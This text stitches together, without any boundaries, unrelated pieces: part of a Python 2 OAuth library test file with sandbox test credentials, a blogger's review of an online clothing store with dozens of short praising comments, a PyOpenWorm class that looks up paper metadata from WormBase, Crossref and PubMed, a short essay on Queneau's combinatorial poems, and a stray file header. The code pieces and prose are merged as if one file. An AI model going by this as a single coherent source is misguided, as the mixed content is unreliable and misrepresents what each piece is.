self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token_secret='))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token=asfdasf'))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token='))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token=&oauth_token_secret='))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token=tooken%26oauth_token_secret=seecret'))
string = self.token.to_string()
new = oauth.Token.from_string(string)
self._compare_tokens(new)
self.token.set_callback('http://www.example.com/my-callback')
string = self.token.to_string()
new = oauth.Token.from_string(string)
self._compare_tokens(new)
class TestRequest(unittest.TestCase):
def test_setter(self):
url = "http://example.com"
method = "GET"
req = oauth.Request(method)
try:
url = req.url
self.fail("AttributeError should have been raised on empty url.")
except AttributeError:
pass
except Exception, e:
self.fail(str(e))
def test_deleter(self):
url = "http://example.com"
method = "GET"
req = oauth.Request(method, url)
try:
del req.url
url = req.url
self.fail("AttributeError should have been raised on empty url.")
except AttributeError:
pass
except Exception, e:
self.fail(str(e))
def test_url(self):
url1 = "http://example.com:80/foo.php"
url2 = "https://example.com:443/foo.php"
exp1 = "http://example.com/foo.php"
exp2 = "https://example.com/foo.php"
method = "GET"
req = oauth.Request(method, url1)
self.assertEquals(req.url, exp1)
req = oauth.Request(method, url2)
self.assertEquals(req.url, exp2)
def test_get_parameter(self):
url = "http://example.com"
method = "GET"
params = {'oauth_consumer' : 'asdf'}
req = oauth.Request(method, url, parameters=params)
self.assertEquals(req.get_parameter('oauth_consumer'), 'asdf')
self.assertRaises(oauth.Error, req.get_parameter, 'blah')
def test_get_nonoauth_parameters(self):
oauth_params = {
'oauth_consumer': 'asdfasdfasdf'
}
other_params = {
'foo': 'baz',
'bar': 'foo',
'multi': ['FOO','BAR']
}
params = oauth_params
params.update(other_params)
req = oauth.Request("GET", "http://example.com", params)
self.assertEquals(other_params, req.get_nonoauth_parameters())
def test_to_header(self):
realm = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
}
req = oauth.Request("GET", realm, params)
header, value = req.to_header(realm).items()[0]
parts = value.split('OAuth ')
vars = parts[1].split(', ')
self.assertTrue(len(vars), (len(params) + 1))
res = {}
for v in vars:
var, val = v.split('=')
res[var] = urllib.unquote(val.strip('"'))
self.assertEquals(realm, res['realm'])
del res['realm']
self.assertTrue(len(res), len(params))
for key, val in res.items():
self.assertEquals(val, params.get(key))
def test_to_postdata(self):
realm = "http://sp.example.com/"
params = {
'multi': ['FOO','BAR'],
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
}
req = oauth.Request("GET", realm, params)
flat = [('multi','FOO'),('multi','BAR')]
del params['multi']
flat.extend(params.items())
kf = lambda x: x[0]
self.assertEquals(sorted(flat, key=kf), sorted(parse_qsl(req.to_postdata()), key=kf))
def test_to_url(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
}
req = oauth.Request("GET", url, params)
exp = urlparse.urlparse("%s?%s" % (url, urllib.urlencode(params)))
res = urlparse.urlparse(req.to_url())
self.assertEquals(exp.scheme, res.scheme)
self.assertEquals(exp.netloc, res.netloc)
self.assertEquals(exp.path, res.path)
a = parse_qs(exp.query)
b = parse_qs(res.query)
self.assertEquals(a, b)
def test_get_normalized_parameters(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'multi': ['FOO','BAR'],
}
req = oauth.Request("GET", url, params)
res = req.get_normalized_parameters()
srtd = [(k, v if type(v) != ListType else sorted(v)) for k,v in sorted(params.items())]
self.assertEquals(urllib.urlencode(srtd, True), res)
def test_get_normalized_parameters_ignores_auth_signature(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_signature': "some-random-signature-%d" % random.randint(1000, 2000),
'oauth_token': "ad180jjd733klru7",
}
req = oauth.Request("GET", url, params)
res = req.get_normalized_parameters()
self.assertNotEquals(urllib.urlencode(sorted(params.items())), res)
foo = params.copy()
del foo["oauth_signature"]
self.assertEqual(urllib.urlencode(sorted(foo.items())), res)
def test_get_normalized_string_escapes_spaces_properly(self):
url = "http://sp.example.com/"
params = {
"some_random_data": random.randint(100, 1000),
"data": "This data with a random number (%d) has spaces!" % random.randint(1000, 2000),
}
req = oauth.Request("GET", url, params)
res = req.get_normalized_parameters()
expected = urllib.urlencode(sorted(params.items())).replace('+', '%20')
self.assertEqual(expected, res)
def test_sign_request(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200"
}
tok = oauth.Token(key="tok-test-key", secret="tok-test-secret")
con = oauth.Consumer(key="con-test-key", secret="con-test-secret")
params['oauth_token'] = tok.key
params['oauth_consumer_key'] = con.key
req = oauth.Request(method="GET", url=url, parameters=params)
methods = {
'TQ6vGQ5A6IZn8dmeGB4+/Jl3EMI=': oauth.SignatureMethod_HMAC_SHA1(),
'con-test-secret&tok-test-secret': oauth.SignatureMethod_PLAINTEXT()
}
for exp, method in methods.items():
req.sign_request(method, con, tok)
self.assertEquals(req['oauth_signature_method'], method.name)
self.assertEquals(req['oauth_signature'], exp)
def test_from_request(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
}
req = oauth.Request("GET", url, params)
headers = req.to_header()
# Test from the headers
req = oauth.Request.from_request("GET", url, headers)
self.assertEquals(req.method, "GET")
self.assertEquals(req.url, url)
self.assertEquals(params, req.copy())
# Test with bad OAuth headers
bad_headers = {
'Authorization' : 'OAuth this is a bad header'
}
self.assertRaises(oauth.Error, oauth.Request.from_request, "GET",
url, bad_headers)
# Test getting from query string
qs = urllib.urlencode(params)
req = oauth.Request.from_request("GET", url, query_string=qs)
exp = parse_qs(qs, keep_blank_values=False)
for k, v in exp.iteritems():
exp[k] = urllib.unquote(v[0])
self.assertEquals(exp, req.copy())
# Test that a boned from_request() call returns None
req = oauth.Request.from_request("GET", url)
self.assertEquals(None, req)
def test_from_token_and_callback(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
}
tok = oauth.Token(key="tok-test-key", secret="tok-test-secret")
req = oauth.Request.from_token_and_callback(tok)
self.assertFalse('oauth_callback' in req)
self.assertEquals(req['oauth_token'], tok.key)
req = oauth.Request.from_token_and_callback(tok, callback=url)
self.assertTrue('oauth_callback' in req)
self.assertEquals(req['oauth_callback'], url)
def test_from_consumer_and_token(self):
url = "http://sp.example.com/"
tok = oauth.Token(key="tok-test-key", secret="tok-test-secret")
con = oauth.Consumer(key="con-test-key", secret="con-test-secret")
req = oauth.Request.from_consumer_and_token(con, token=tok,
http_method="GET", http_url=url)
self.assertEquals(req['oauth_token'], tok.key)
self.assertEquals(req['oauth_consumer_key'], con.key)
class SignatureMethod_Bad(oauth.SignatureMethod):
name = "BAD"
def signing_base(self, request, consumer, token):
return ""
def sign(self, request, consumer, token):
return "invalid-signature"
class TestServer(unittest.TestCase):
def setUp(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': int(time.time()),
'bar': 'blerg',
'multi': ['FOO','BAR'],
'foo': 59
}
self.consumer = oauth.Consumer(key="consumer-key",
secret="consumer-secret")
self.token = oauth.Token(key="token-key", secret="token-secret")
params['oauth_token'] = self.token.key
params['oauth_consumer_key'] = self.consumer.key
self.request = oauth.Request(method="GET", url=url, parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
self.request.sign_request(signature_method, self.consumer, self.token)
def test_init(self):
server = oauth.Server(signature_methods={'HMAC-SHA1' : oauth.SignatureMethod_HMAC_SHA1()})
self.assertTrue('HMAC-SHA1' in server.signature_methods)
self.assertTrue(isinstance(server.signature_methods['HMAC-SHA1'],
oauth.SignatureMethod_HMAC_SHA1))
server = oauth.Server()
self.assertEquals(server.signature_methods, {})
def test_add_signature_method(self):
server = oauth.Server()
res = server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
self.assertTrue(len(res) == 1)
self.assertTrue('HMAC-SHA1' in res)
self.assertTrue(isinstance(res['HMAC-SHA1'],
oauth.SignatureMethod_HMAC_SHA1))
res = server.add_signature_method(oauth.SignatureMethod_PLAINTEXT())
self.assertTrue(len(res) == 2)
self.assertTrue('PLAINTEXT' in res)
self.assertTrue(isinstance(res['PLAINTEXT'],
oauth.SignatureMethod_PLAINTEXT))
def test_verify_request(self):
server = oauth.Server()
server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
parameters = server.verify_request(self.request, self.consumer,
self.token)
self.assertTrue('bar' in parameters)
self.assertTrue('foo' in parameters)
self.assertTrue('multi' in parameters)
self.assertEquals(parameters['bar'], 'blerg')
self.assertEquals(parameters['foo'], 59)
self.assertEquals(parameters['multi'], ['FOO','BAR'])
def test_no_version(self):
url = "http://sp.example.com/"
params = {
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': int(time.time()),
'bar': 'blerg',
'multi': ['FOO','BAR'],
'foo': 59
}
self.consumer = oauth.Consumer(key="consumer-key",
secret="consumer-secret")
self.token = oauth.Token(key="token-key", secret="token-secret")
params['oauth_token'] = self.token.key
params['oauth_consumer_key'] = self.consumer.key
self.request = oauth.Request(method="GET", url=url, parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
self.request.sign_request(signature_method, self.consumer, self.token)
server = oauth.Server()
server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
parameters = server.verify_request(self.request, self.consumer,
self.token)
def test_invalid_version(self):
url = "http://sp.example.com/"
params = {
'oauth_version': '222.9922',
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': int(time.time()),
'bar': 'blerg',
'multi': ['foo','bar'],
'foo': 59
}
consumer = oauth.Consumer(key="consumer-key",
secret="consumer-secret")
token = oauth.Token(key="token-key", secret="token-secret")
params['oauth_token'] = token.key
params['oauth_consumer_key'] = consumer.key
request = oauth.Request(method="GET", url=url, parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
request.sign_request(signature_method, consumer, token)
server = oauth.Server()
server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
self.assertRaises(oauth.Error, server.verify_request, request,
consumer, token)
def test_invalid_signature_method(self):
url = "http://sp.example.com/"
params = {
'oauth_version': '1.0',
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': int(time.time()),
'bar': 'blerg',
'multi': ['FOO','BAR'],
'foo': 59
}
consumer = oauth.Consumer(key="consumer-key",
secret="consumer-secret")
token = oauth.Token(key="token-key", secret="token-secret")
params['oauth_token'] = token.key
params['oauth_consumer_key'] = consumer.key
request = oauth.Request(method="GET", url=url, parameters=params)
signature_method = SignatureMethod_Bad()
request.sign_request(signature_method, consumer, token)
server = oauth.Server()
server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
self.assertRaises(oauth.Error, server.verify_request, request,
consumer, token)
def test_missing_signature(self):
url = "http://sp.example.com/"
params = {
'oauth_version': '1.0',
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': int(time.time()),
'bar': 'blerg',
'multi': ['FOO','BAR'],
'foo': 59
}
consumer = oauth.Consumer(key="consumer-key",
secret="consumer-secret")
token = oauth.Token(key="token-key", secret="token-secret")
params['oauth_token'] = token.key
params['oauth_consumer_key'] = consumer.key
request = oauth.Request(method="GET", url=url, parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
request.sign_request(signature_method, consumer, token)
del request['oauth_signature']
server = oauth.Server()
server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
self.assertRaises(oauth.MissingSignature, server.verify_request,
request, consumer, token)
# Request Token: http://oauth-sandbox.sevengoslings.net/request_token
# Auth: http://oauth-sandbox.sevengoslings.net/authorize
# Access Token: http://oauth-sandbox.sevengoslings.net/access_token
# Two-legged: http://oauth-sandbox.sevengoslings.net/two_legged
# Three-legged: http://oauth-sandbox.sevengoslings.net/three_legged
# Key: bd37aed57e15df53
# Secret: 0e9e6413a9ef49510a4f68ed02cd
class TestClient(unittest.TestCase):
# oauth_uris = {
# 'request_token': '/request_token.php',
# 'access_token': '/access_token.php'
# }
oauth_uris = {
'request_token': '/request_token',
'authorize': '/authorize',
'access_token': '/access_token',
'two_legged': '/two_legged',
'three_legged': '/three_legged'
}
consumer_key = 'bd37aed57e15df53'
consumer_secret = '0e9e6413a9ef49510a4f68ed02cd'
host = 'http://oauth-sandbox.sevengoslings.net'
def setUp(self):
self.mox = mox.Mox()
self.consumer = oauth.Consumer(key=self.consumer_key,
secret=self.consumer_secret)
self.body = {
'foo': 'bar',
'bar': 'foo',
'multi': ['FOO','BAR'],
'blah': 599999
}
def tearDown(self):
self.mox.UnsetStubs()
def _uri(self, type):
uri = self.oauth_uris.get(type)
if uri is None:
raise KeyError("%s is not a valid OAuth URI type." % type)
return "%s%s" % (self.host, uri)
def create_simple_multipart_data(self, data):
boundary = '---Boundary-%d' % random.randint(1,1000)
crlf = '\r\n'
items = []
for key, value in data.iteritems():
items += [
'--'+boundary,
'Content-Disposition: form-data; name="%s"'%str(key),
'',
str(value),
]
items += ['', '--'+boundary+'--', '']
content_type = 'multipart/form-data; boundary=%s' % boundary
return content_type, crlf.join(items)
def test_access_token_get(self):
"""Test getting an access token via GET."""
client = oauth.Client(self.consumer, None)
resp, content = client.request(self._uri('request_token'), "GET")
self.assertEquals(int(resp['status']), 200)
def test_access_token_post(self):
"""Test getting an access token via POST."""
client = oauth.Client(self.consumer, None)
resp, content = client.request(self._uri('request_token'), "POST")
self.assertEquals(int(resp['status']), 200)
res = dict(parse_qsl(content))
self.assertTrue('oauth_token' in res)
self.assertTrue('oauth_token_secret' in res)
def _two_legged(self, method):
client = oauth.Client(self.consumer, None)
return client.request(self._uri('two_legged'), method,
body=urllib.urlencode(self.body))
def test_two_legged_post(self):
"""A test of a two-legged OAuth POST request."""
resp, content = self._two_legged("POST")
self.assertEquals(int(resp['status']), 200)
def test_two_legged_get(self):
"""A test of a two-legged OAuth GET request."""
resp, content = self._two_legged("GET")
self.assertEquals(int(resp['status']), 200)
def test_multipart_post_does_not_alter_body(self):
self.mox.StubOutWithMock(httplib2.Http, 'request')
random_result = random.randint(1,100)
data = {
'rand-%d'%random.randint(1,100):random.randint(1,100),
}
content_type, body = self.create_simple_multipart_data(data)
client = oauth.Client(self.consumer, None)
uri = self._uri('two_legged')
expected_kwargs = {
'method':'POST',
'body':body,
'redirections':httplib2.DEFAULT_MAX_REDIRECTS,
'connection_type':None,
'headers':mox.IsA(dict),
}
httplib2.Http.request(client, uri, **expected_kwargs).AndReturn(random_result)
self.mox.ReplayAll()
result = client.request(uri, 'POST', headers={'Content-Type':content_type}, body=body)
self.assertEqual(result, random_result)
self.mox.VerifyAll()
if __name__ == "__main__":
unittest.main()
|
Thank you for living through fashion week with me! We made it through the first one! Yay! You might have noticed I was wearing new items and I promised you to tell more about. I do it now. This is my review for Dropship Clothes online store.
You already know the short version: I enjoyed everything about it. The clothes I received were very pretty, the quality far exceeded my expectations, size was true to what they wrote (it is often end up being too big comparing to the promises so I am even more thankful).
My first items was a dress. Very chic, very nice to touch. Sleeves are fantastic and they totally hold the form. It already went through laundry: no issues. And the sleeves are just as pretty. The skirt is on its place.
The vest. White is always a little tricky but I will manage. The hood is big enough to fit my sort of big head. It is very warm: when they it is for winter it is for real winter. It might be even an outwear during fall or spring. The buttons are made of lovely material, much like wood.
The shopping experience: pleasant. search works nicely, size charts are available for each item, many options to choose from even if you are petite.
Shipping: fast, no issues, tracking provided.
I didn't get to talk to support center because everything was super smooth.
Will I shop there for myself? Most likely 'yes'.
And if you are not convinced as of yet: there is a Big Sale going on there! Grabbing spring update to your closet with big discounts: I totally vote for it!
Hiii, I love your looks, they are so fashion!! You made a good review with this beautiful looks!
I like the first outfit and then I gladly followed the fly fashion week, really unique and original!
I love your style, you pull these outfits off so well. I really love the white vest, love the black accent buttons.
I am living for that white coat combo you have. You have amazing taste and style!
The clothes loooks good on you, I love the reviews. I want the white jacket.
I LOVE that white vest!! Especially the detailed closures. Beautiful!!
The clothes look super cool and my favorite pick is the white vest with hoodie, super cute and cool.
Lovely reading the review of your outfits. You look classy.
Cool! I lve some of the outfits in this article. Great info, thanks.
love the white vest! Lovely turtleneck dress as well. You look great in both outfits.
The first outfit looks so cute on you! Is it a sweater dress? I love the cozy look. Fashion week is always fun!
I absolutely love both of these looks, they're so unique. I love the dress, it looks so versatile!
It sounds like a great service! I love the looks. Super cute!
Wow the dropship dress is really cute actually. I also love the white puff jacket!
Lovely outfits; you style them so well!
I checked out the Big Sale. Lots of cute items that are reasonably priced. Great resource!
You are so petite and cute! I love your outfit choice; you wear it well!
I love the vest! It is so cute. I have a vest myself, but it is more for formal wear than anything else.
The sleeves on the dress add a nice dimension to an otherwise simple grey dress. I'm glad to hear they still kept their shape after washing.
I do really like the vest on you. But you are right. White is pretty tricky when trying to put it together in en ensemble. Looks great.
I love this outfit it fits together really well. I love the skirt, and how well it pairs with the vest.
I am so in love with your style, you look so cute and stunning. Amazing style for real.
This is so lovely! How I wish I was as talented and could pull off such a look.
This is so trendy! I wish I could wear something like this, it's so cool!
I just love to wear clothes with hoods. They make me feel so cozy and comfortable!
The white coat is so sassy! I want to have something like that too. I will have to check out this shop. I am needing some new pieces for spring!
I love the white coat. It looks perfect for spring! I love hoodies and glad that this coat has one. You made some good clothing choices here!
These outfits are stylish and comfortable too. Go so well as spring wears.
These dresses look amazing! I'm usually not a dress kind of person but I feel these could suit me. Haha.
The dress is really cute with the leggings. It looks nice and warm.
That dress looks really beautiful with the white vest! Very comfortable.
Great fashionable dress. Each has it's own uniqueness. You look awesome carrying them so well.
I agree. You have perfectly combined your clothing. Especially the dress and the vest. There is something youthful and elegant about it.
All of your outfits are on point! This looked like so much fun. I love how elegant yet edgy your outfit is.
Im loving both of these looks. You seriously have the best style.
Nice outfits. Sounds like you have had a great experience with them! Thank you for sharing!
These dresses look so comfy and you know I am all about the comfort!
So cute! love the looks, the dresses look really comfy! |
from PyOpenWorm import *
class EvidenceError(Exception):
pass
def _pubmed_uri_to_pmid(uri):
from urlparse import urlparse
parsed = urlparse(uri)
pmid = int(parsed.path.split("/")[2])
return pmid
def _doi_uri_to_doi(uri):
from urlparse import urlparse
from urllib2 import unquote
parsed = urlparse(uri)
doi = parsed.path.split("/")[1]
# the doi from a url needs to be decoded
doi = unquote(doi)
return doi
def _url_request(url,headers={}):
import urllib2 as U
try:
r = U.Request(url, headers=headers)
s = U.urlopen(r, timeout=1)
return s
except U.HTTPError:
return ""
except U.URLError:
return ""
def _json_request(url):
import json
headers = {'Content-Type': 'application/json'}
try:
return json.load(_url_request(url,headers))
except BaseException:
return {}
class AssertsAllAbout(Property):
# TODO: Needs tests!
multiple=True
def __init__(self, **kwargs):
Property.__init__(self, 'asserts_all_about', **kwargs)
def set(self, o, **kwargs):
"""Establish the "asserts" relationship for all of the properties of the given object"""
self.owner.asserts(o)
for p in o.properties:
self.owner.asserts(p)
def get(self, **kwargs):
# traverse the hierarchy of ObjectProperties and return all of the asserts relationships...
ns = { "ow": self.base_namespace,
"ns1" : self.rdf_namespace,
"ev": self.base_namespace["Evidence"] + "/",
"ns2" : self.base_namespace["SimpleProperty"] + "/"
}
q = """
SELECT ?DataObject ?x ?prop WHERE
{
?DataObject rdf:type ow:DataObject .
?DataObject ?x ?DataObject_prop .
?DataObject_prop sp:value ?prop .
?Evidence ev:asserts ?Evidence_asserts .
filter (EXISTS { ?DataObject_prop rdf:type ow:Property . })
# object
# asserts property pattern
# general property pattern
}
"""
def triples(self, **kwargs):
#XXX: All triples here are from ``asserts``
return []
class Evidence(DataObject):
"""
A representation of some document which provides evidence like scholarly
references, for other objects.
Possible keys include::
pmid,pubmed: a pubmed id or url (e.g., 24098140)
wbid,wormbase: a wormbase id or url (e.g., WBPaper00044287)
doi: a Digitial Object id or url (e.g., s00454-010-9273-0)
Attaching evidence
-------------------
Attaching evidence to an object is as easy as::
e = Evidence(author='White et al.', date='1986')
e.asserts(Connection(pre_cell="VA11", post_cell="VD12"))
e.save()
But what does this series of statements mean? For us it means that White et al.
assert that "the cells VA11 and VD12 have a connection".
In particular, it says nothing about the neurons themselves.
Another example::
e = Evidence(author='Sulston et al.', date='1983')
e.asserts(Neuron(name="AVDL").lineageName("AB alaaapalr"))
e.save()
This would say that Sulston et al. claimed that neuron AVDL has lineage AB alaaapalr.
Now a more ambiguous example::
e = Evidence(author='Sulston et al.', date='1983')
e.asserts(Neuron(name="AVDL"))
e.save()
What might this mean? There's no clear relationship being discussed as in the
previous examples. There are two reasonable semantics for
these statements. They could indicate that Sulston et al. assert everything
about the AVDL (in this case, only its name). Or they could
indicate that Sulston et al. state the existence of AVDL. We will assume the
semantics of the latter for *most* objects. The second
intention can be expressed as::
e = Evidence(author='Sulston et al.', date='1983')
e.asserts_all_about(Neuron(name="AVDL"))
e.save()
`asserts_all_about` individually asserts each of the properties of the Neuron
including its existence. It does not recursively assert
properties of values set on the AVDL Neuron. If, for instance, the Neuron had a
*complex object* as the value for its receptor types with
information about the receptor's name primary agonist, etc., `asserts_all_about`
would say nothing about these. However, `asserts_all` (TODO)::
e.asserts_all(Neuron(name="AVDL",receptor=complex_receptor_object))
would make the aforementioned recursive statement.
Retrieving evidence
-------------------
.. Not tested with the latest
Retrieving evidence for an object is trivial as well ::
e = Evidence()
e.asserts(Connection(pre_cell="VA11", post_cell="VD12"))
for x in e.load():
print x
This would print all of the evidence for the connection between VA11 and VD12
It's important to note that the considerations of recursive evidence assertions
above do not operate for retrieval. Only evidence for the
particular object queried (the Connection in the example above), would be
returned and not any evidence for anything otherwise about VA11
or VD12.
Attributes
----------
asserts : ObjectProperty (value_type=DataObject)
When used with an argument, state that this Evidence asserts that the
relationship is true.
Example::
import bibtex
bt = bibtex.parse("my.bib")
n1 = Neuron("AVAL")
n2 = Neuron("DA3")
c = Connection(pre=n1,post=n2,class="synapse")
e = Evidence(bibtex=bt['white86'])
e.asserts(c)
Other methods return objects which asserts accepts.
Example::
n1 = Neuron("AVAL")
r = n1.neighbor("DA3")
e = Evidence(bibtex=bt['white86'])
e.asserts(r)
When used without arguments, returns a sequence of statements asserted by
this evidence
Example::
import bibtex
bt = bibtex.parse("my.bib")
n1 = Neuron("AVAL")
n2 = Neuron("DA3")
c = Connection(pre=n1,post=n2,class="synapse")
e = Evidence(bibtex=bt['white86'])
e.asserts(c)
list(e.asserts()) # Returns a list [..., d, ...] such that d==c
doi : DatatypeProperty
A Digital Object Identifier (DOI) that provides evidence, optional
pmid : DatatypeProperty
A PubMed ID (PMID) that point to a paper that provides evidence, optional
wormbaseid : DatatypeProperty
An ID from WormBase that points to a record that provides evidence, optional
author : DatatypeProperty
The author of the evidence
title : DatatypeProperty
The title of the evidence
year : DatatypeProperty
The date (e.g., publication date) of the evidence
uri : DatatypeProperty
A URL that points to evidence
Parameters
----------
doi : string
A Digital Object Identifier (DOI) that provides evidence, optional
pmid : string
A PubMed ID (PMID) that point to a paper that provides evidence, optional
wormbaseid : string
An ID from WormBase that points to a record that provides evidence, optional
author : string
The author of the evidence
title : string
The title of the evidence
year : string or int
The date (e.g., publication date) of the evidence
uri : string
A URL that points to evidence
"""
def __init__(self, conf=False, **source):
# The type of the evidence (a paper, a lab, a uri) is
# determined by the `source` key
# We keep track of a set of fields for the evidence.
# Some of the fields are pulled from provided URIs and
# some is provided by the user.
#
# Turns into a star graph
#
# Evidence field1 value1
# ; field2 value2
# ; field3 value3 .
DataObject.__init__(self, conf=conf)
self._fields = dict()
Evidence.ObjectProperty('asserts', multiple=True, owner=self)
AssertsAllAbout(owner=self)
multivalued_fields = ('author', 'uri')
for x in multivalued_fields:
Evidence.DatatypeProperty(x, multiple=True, owner=self)
other_fields = ('year',
'title',
'doi',
'wbid',
'pmid')
fields = multivalued_fields + other_fields
for x in other_fields:
Evidence.DatatypeProperty(x, owner=self)
#XXX: I really don't like putting these in two places
for k in source:
if k in ('pubmed', 'pmid'):
self._fields['pmid'] = source[k]
self._pubmed_extract()
self.pmid(source[k])
if k in ('wormbaseid','wormbase', 'wbid'):
self._fields['wormbase'] = source[k]
self._wormbase_extract()
self.wbid(source[k])
if k in ('doi',):
self._fields['doi'] = source[k]
self._crossref_doi_extract()
self.doi(source[k])
if k in ('bibtex',):
self._fields['bibtex'] = source[k]
if k in fields:
getattr(self,k)(source[k])
def add_data(self, k, v):
""" Add a field
Parameters
----------
k : string
Field name
v : string
Field value
"""
self._fields[k] = v
dp = Evidence.DatatypeProperty(k,owner=self)
dp(v)
# Each 'extract' method should attempt to fill in additional fields given which ones
# are already set as well as correct fields that are wrong
# TODO: Provide a way to override modification of already set values.
def _wormbase_extract(self):
#XXX: wormbase's REST API is pretty sparse in terms of data provided.
# Would be better off using AQL or the perl interface
# _Very_ few of these have these fields filled in
wbid = self._fields['wormbase']
def wbRequest(ident,field):
return _json_request("http://api.wormbase.org/rest/widget/paper/"+wbid+"/"+field)
# get the author
j = wbRequest(wbid, 'authors')
if 'fields' in j:
f = j['fields']
if 'data' in f:
self.author([x['label'] for x in f['data']])
elif 'name' in f:
self.author(f['name']['data']['label'])
# get the publication date
j = wbRequest(wbid, 'publication_date')
if 'fields' in j:
f = j['fields']
if 'data' in f:
self.year(f['data']['label'])
elif 'name' in f:
self.year(f['name']['data']['label'])
def _crossref_doi_extract(self):
# Extract data from crossref
def crRequest(doi):
import urllib as U
data = {'q': doi}
data_encoded = U.urlencode(data)
return _json_request('http://search.labs.crossref.org/dois?%s' % data_encoded)
doi = self._fields['doi']
if doi[:4] == 'http':
doi = _doi_uri_to_doi(doi)
r = crRequest(doi)
#XXX: I don't think coins is meant to be used, but it has structured data...
if len(r)>0:
extra_data = r[0]['coins'].split('&')
fields = (x.split("=") for x in extra_data)
fields = [[y.replace('+', ' ').strip() for y in x] for x in fields]
authors = [x[1] for x in fields if x[0] == 'rft.au']
for a in authors:
self.author(a)
# no error for bad ids, just an empty list
if len(r) > 0:
# Crossref can process multiple doi's at one go and return the metadata. we just need the first one
r = r[0]
if 'title' in r:
self.title(r['title'])
if 'year' in r:
self.year(r['year'])
def _pubmed_extract(self):
def pmRequest(pmid):
import xml.etree.ElementTree as ET # Python 2.5 and up
base = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/'
# XXX: There's more data in esummary.fcgi?, but I don't know how to parse it
url = base + "esummary.fcgi?db=pubmed&id=%d" % pmid
return ET.parse(_url_request(url))
pmid = self._fields['pmid']
if pmid[:4] == 'http':
# Probably a uri, right?
pmid = _pubmed_uri_to_pmid(pmid)
pmid = int(pmid)
tree = pmRequest(pmid)
for x in tree.findall('./DocSum/Item[@Name="AuthorList"]/Item'):
self.author(x.text)
|
Poetry for me has many faces. It is the act of creation, etymologically (“poiein” in Greek “to make”). It is of course the more romantic notion of a beautiful instant (best described by Kundera in his famous quote—“The purpose of the poetry is not to dazzle us with an astonishing thought, but to make one moment of existence unforgettable and worthy of unbearable nostalgia.”). And it is an excuse to allow ourselves to play with words, as if they were physical matter, to push them against each other, make them fit atop each other, put them in motion together.
An emblematic work of the OuLiPo is “Cent Mille Milliards de Poèmes” by Raymond Queneau in 1961. This is a book composed of 10 sonnets, each 14 verses long, written on 10 successive pages, where each verse is cut so as to make it possible to combine all the poems from all the pages together in any way, resulting in 10 to the 14 poems, that is, a hundred thousand billion poems. This will be my choice as a favorite poem, although it is more a way to make poems.
I always loved constraints as a means of liberating the writer of his own “inner critic”—you write words because they satisfy the constraints, not because you thought they would go well together in the first place. It allows for a kind of meditative state while writing, since you detach from meaning to give importance to constraints. And this allows serendipitous beauty.
In a sense, it reminds me of the description by Joyce Dyer of “seeing like an animal”—forcing yourself to detach of your “human prejudices” and see the world anew (like would children, an animal, or someone who is forced to satisfy constraints). |
# -*- coding: utf-8 -*-
# pylint: disable=bad-continuation
